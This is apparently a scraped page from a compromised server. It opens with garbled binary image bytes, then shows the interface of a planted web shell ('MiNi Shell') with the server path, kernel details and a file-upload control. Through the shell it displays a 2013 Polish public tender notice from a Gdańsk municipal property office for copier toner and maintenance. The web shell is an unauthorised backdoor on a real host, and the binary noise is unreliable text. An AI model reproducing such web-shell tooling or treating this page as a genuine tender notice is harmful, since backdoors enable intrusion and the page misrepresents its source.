JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130122/30612-N-2013.html

<p class="kh_header"><b>Gdańsk: dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek</b><br>
<b>Numer ogłoszenia: 30612 - 2013; data zamieszczenia: 22.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych i części zamiennych do 	kserokopiarek oraz świadczenie usług konserwacji i naprawy kserokopiarek na potrzeby Gdańskiego 	Zarządu Nieruchomości Komunalnych Samorządowy Zakład Budżetowy. <br>
	
Konserwacje i naprawy obejmują w szczególności:<br>

a)	 przeglądy okresowe,<br>

b)	 regulacje oraz naprawy podzespołów wchodzących w skład kserokopiarek.<br>


Całkowita ilość kserokopiarek do konserwacji - 47 szt.<br>

Planowana ilość  tonerów -  570 szt.<br>


Kserokopiarki objęte obecnie gwarancją, będą podlegały obsłudze technicznej z chwilą upływu terminu gwarancji.<br>


2)	Konserwacja  i przegląd kserokopiarek co najmniej raz na kwartał obejmuje następujące czynności:<br>

a)	demontaż i montaż  obudów zewnętrznych i wewnętrznych,<br>

b)	czyszczenie wnętrza (usuniecie pyłów papieru, tonera oraz kurzu),<br>

c)	czyszczenie  zespołu czyszczącego bębna,<br>

d)	czyszczenie zespołu optyki,<br>

e)	czyszczenie kaset papieru,<br>

f)	czyszczenie filtrów,<br>

g)	czyszczenie drogi transportu papieru,<br>

h)	czyszczenie napędu głównego,<br>

i)	czyszczenie sekcji grzejnej,<br>

j)	czyszczenie sekcji pobierania  papieru,<br>

k)	demontaż i montaż  poszczególnych sekcji, zespołów w/w.<br>

l)	sprawdzenie działania kserokopiarki,<br>

m)	regulacja jakości kopii,<br>

n)	dokonanie przeglądu sprawności urządzenia oraz poświadczenie wykonanej usługi protokołem  przeglądu,<br>


3)	Naprawa obejmuje następujące czynności:<br>

a)	naprawę usterek technicznych kserokopiarek wynikających z działania części określonych w pkt. 5),<br>

b)	wymianę uszkodzonych części urządzenia określonych w pkt. 5),<br>

c)	sprawdzenie poprawności działania sprzętu po naprawie,<br>

d)	ekspertyzę opłacalności naprawy sprzętu.<br>


4)	Dostawa materiałów eksploatacyjnych wraz z ich wymianą obejmuje tonery.<br>



5)	Dostawa części zamiennych wraz z ich wymianą obejmuje:<br>

a)	bęben światłoczuły (czarny, czerwony, żółty, niebieski),<br>

b)	developer,<br>

c)	lampę skanera, <br>

d)	wałek utrwalający grzejny,<br>

e)	wałek teflonowy grzejny,<br>

f)	wałek dociskowy dolny,<br>

g)	tuleję wałka utrwalającego grzejnego,<br>

h)	zespół przeglądowy,<br>

i)	zespół wywołania,<br>

j)	zespół utrwalania.<br>


6)	Naprawa i usługa standardowa obejmuje czynności wyszczególnione w pkt 2) i 5).<br>
 

7)	W przypadku wystąpienia naprawy i usługi nieprzewidzianej w w/w pkt 2) i 5) (usterka niestandardowa) 	wykonawca zobowiązany jest przystąpić do naprawy urządzenia. Zamawiający rozliczy się z Wykonawcą wg 	kosztu 1 rbg oraz materiałów wg cen zakupu (koszt 1 rbg obejmuje również koszty dojazdu).<br>


8)	Miejsce zainstalowania kserokopiarek:<br>

		Dział Techniczny 		ul. Cygańska Góra 1;<br>

 		Zarząd, Dział Eksploatacji, Dział Windykacji, Dział Umów i Rozliczeń, ul. Partyzantów 74; <br>

 		Biuro Zamiany Mieszkań          ul. Dyrekcyjna 6;<br>

BOM   nr  1                              ul. Sienna 6,<br>

BOM   nr  2                              ul. Zielona 8/9,<br>

BOM   nr  4                              ul. Trakt Św. Wojciecha 167,<br>

BOM   nr  6                              ul. Batorego 12,<br>

BOM   nr  7                              ul. Mściwoja II 44,<br>

BOM   nr  8                              ul. Śniadeckich 12,<br>

BOM   nr  9                              ul. Na Zaspę 31.<br>


9)	Materiały eksploatacyjne (tonery) do kserokopiarek muszą spełniać następujące wymagania:<br>

a)	być fabrycznie nowe w opakowaniach oryginalnych producenta i zabezpieczone gwarancją nienaruszenia 	opakowania oraz posiadać 12 miesięczną gwarancję licząc od daty dostawy materiału, a także być 	wyprodukowane w okresie ostatnich 12 miesięcy przed dostawą,<br>

b)	posiadać oznaczenia jak: nazwa, producenta, nr produktu, oraz termin ważności,<br>

c)	posiadać na opakowaniu indywidualny kod materiału eksploatacyjnego oraz nazwę sprzętu, do którego jest 	przeznaczony,<br>

d)	posiadać na produkcie indywidualny kod producenta umożliwiający jednoznaczną identyfikację producenta,<br>

e)	spełniać parametry takie jak: pojemność tonera, wydajność i jakość kopi, co najmniej jak materiały 	oryginalne tzn. pochodzące od producenta urządzenia, do którego materiał jest przeznaczony,<br>

	-	jakość- praca materiałów eksploatacyjnych w urządzeniu kopiującym musi być bezawaryjna i bezproblemowa oraz nie może powodować ograniczeń funkcji i możliwości sprzętu oraz jakości kopi wyspecyfikowanych w warunkach technicznych producenta sprzętu (urządzenia), <br>

- wydajność - zdolność materiału do wykonania odpowiedniej ilości stron kopi o odpowiednim pokryciu 	procentowym nadruku na kartce A-4, z odpowiednią przyczepnością barwnika i równomiernością pokrycia,<br>

f)	nie mogą być regenerowane tzn. takie materiały eksploatacyjne, w których w ich procesie wytwarzania 	zostały wykorzystane gotowe elementy pochodzące z już zużytych materiałów eksploatacyjnych, jak np. 	dysze, obudowy itp, <br>

g)	nie mogą być poddawane procesowi ponownego napełniania,<br>

h)	nie mogą powodować utraty gwarancji producenta sprzętu,<br>

i)	nie mogą powodować uszkodzenia urządzeń, w których będą eksploatowane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.12.51.00-2, 30.12.40.00-4, 30.12.51.10-5, 50.31.00.00-1, 50.32.30.00-5, 30.12.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium: 2 300,00 zł w tym: <br>
Zadanie 1 - 750,00<br>

Zadanie 2 - 900,00<br>

Zadanie 3 - 650,00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert minimum:<br>
W przypadku składania oferty na zadanie 1 i/lub 2 i/lub 3:<br>
- 2 usługi polegające na konserwacji lub naprawie kserokopiarek o wartości minimum 10 000,00 zł brutto w 	ciągu roku,<br>
- 2 dostawy polegające na dostawie tonerów do kserokopiarek o wartości minimum 10 000,00 zł brutto w ciągu 	roku,<br>
<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Powyższe zobowiązanie musi być złożone w formie oryginału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca musi wykazać dysponowanie: <br> 
a)	 w przypadku składania oferty na zadanie 1:<br> 

- 1 osobą na stanowisku serwisanta z co najmniej trzy letnim doświadczeniem w zakresie napraw  kserokopiarek, która została przeszkolona w zakresie napraw kserokopiarek Sharp przez producenta lub przedstawiciela producenta.<br> 

b)	w przypadku składania oferty na zadanie 2:<br> 

- 1 osobą na stanowisku serwisanta z co najmniej trzy letnim doświadczeniem w zakresie napraw kserokopiarek,  która została przeszkolona w zakresie napraw kserokopiarek Kyocera, przez producenta lub przedstawiciela producenta.<br> 

c)	w przypadku składania oferty na zadanie 3:<br> 

- 1 osobą  na stanowisku serwisanta z co najmniej trzy letnim doświadczeniem w zakresie napraw kserokopiarek.<br> 


W przypadku składania oferty na dwa lub trzy zadania w/w warunki muszą być spełnione łącznie.<br> 


Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia. Powyższe zobowiązanie musi być złożone w formie oryginału.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego. <br>
b)	Wskazać w złożonej ofercie części zamówienia, których wykonanie powierzy podwykonawcom. W przypadku nie wskazania części zamówienia, które mają być realizowane przez podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.<br>
c)	Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w punkcie 13 SIWZ.<br>
d)	Złożyć Formularze cenowe, które należy sporządzić wg wzorów  druku Zamawiającego odpowiednio na zadanie 1,2 i 3.<br>
e)	Udzielić co najmniej 12 miesięcznej gwarancji na wykonane usługi natomiast na dostarczone części zamienne 	- gwarancji wynikającej z ogólnie obowiązujących warunków gwarancyjnych na poszczególne części,<br>
f)	Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz 	Wykonawcy,<br>
g)	 Wykazać posiadanie na terenie Trójmiasta co najmniej jednego punktu serwisowego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.60</li>
<li>2 - cena (suma cen jednostkowych netto konserwacji i napraw) - 0.35</li>
<li>3 - cena  roboczogodziny naprawy usterki nieprzewidzianej - 0.05</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. Cena brutto - 12,30 PLN.
Warunki i sposób płatności: gotówka, przelew, zaliczenie pocztowe.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 01.03.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT: 31.01.2013 r. godzina  10:15, miejsce w siedzibie zamawiającego 80-171 Gdańsk, ul. Cygańska Góra 1  - świetlica pokój nr 6 <br>

OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI<br>

 
Grażyna Pietrowska: stanowisko służbowe -specjalista ds. zamówień publicznych,<br>

 80-171 Gdańsk, ul. Cygańska Góra nr 1  pok. 11, tel. 58 320 02 20 <br>


Adres poczty elektronicznej: pietrowska@gznk.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek Sharp.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kserokopiarek będących w użytkowaniu GZNK-SZB oraz przewidywana ilość tonerów: <br>
Sharp Max 2300     szt 3; tonerów 36 szt. cz/b i 36 szt. kolor<br>

Sharp Max 2301     szt 1; tonerów 12 szt. cz/b i 12 szt. kolor<br>

Sharp Max 2310     szt 1; tonerów 12 szt. cz/b i 12 szt. kolor..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.12.51.00-2, 30.12.40.00-4, 30.12.51.10-5, 50.31.00.00-1, 50.32.30.00-5, 30.12.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.60</li>
<li>2. cena (suma cen jednostkowych netto konserwacji i napraw) - 0.35</li>
<li>3. cena  roboczogodziny naprawy usterki nieprzewidzianej - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek Mita, Kyocera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kserokopiarek będących w użytkowaniu GZNK-SZB oraz przewidywana ilość tonerów: <br> 
Mita DC 1560         szt.  2; tonerów  24 szt.<br> 

Mita DC 1860         szt.  1; tonerów  12 szt.<br> 

Kyocera KM 1620   szt.16; tonerów 192 szt.<br> 

Kyocera TA 180     szt.  6; tonerów   72 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.12.51.00-2, 30.12.40.00-4, 30.12.51.10-5, 50.31.00.00-1, 50.32.30.00-5, 30.12.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.60</li>
<li>2. cena (suma cen jednostkowych netto konserwacji i napraw) - 0.35</li>
<li>3. cena  roboczogodziny naprawy usterki nieprzewidzianej - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa tonerów do kserokopiarek oraz konserwacja i naprawa kserokopiarek Panasonic, Konica Minolta, Canon.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kserokopiarek będących w użytkowaniu GZNK-SZB oraz przewidywana ilość tonerów: <br>
Panasonic FP 7713                 szt. 1; tonerów 12 szt.<br>

Panasonic DP 1810                 szt. 2; tonerów 24 szt.<br>

Konica Minolta Di 1611           szt. 7; tonerów 50 szt.<br>

Konica Minolta Bishup C350    szt. 1; tonerów 12 szt. cz/b i 12 szt. kolor<br>

Canon NP 6512                      szt. 6; tonerów  40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.12.51.00-2, 30.12.40.00-4, 30.12.51.10-5, 50.31.00.00-1, 50.32.30.00-5, 30.12.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.60</li>
<li>2. cena (suma cen jednostkowych netto konserwacji i napraw) - 0.35</li>
<li>3. cena  roboczogodziny naprawy usterki nieprzewidzianej - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com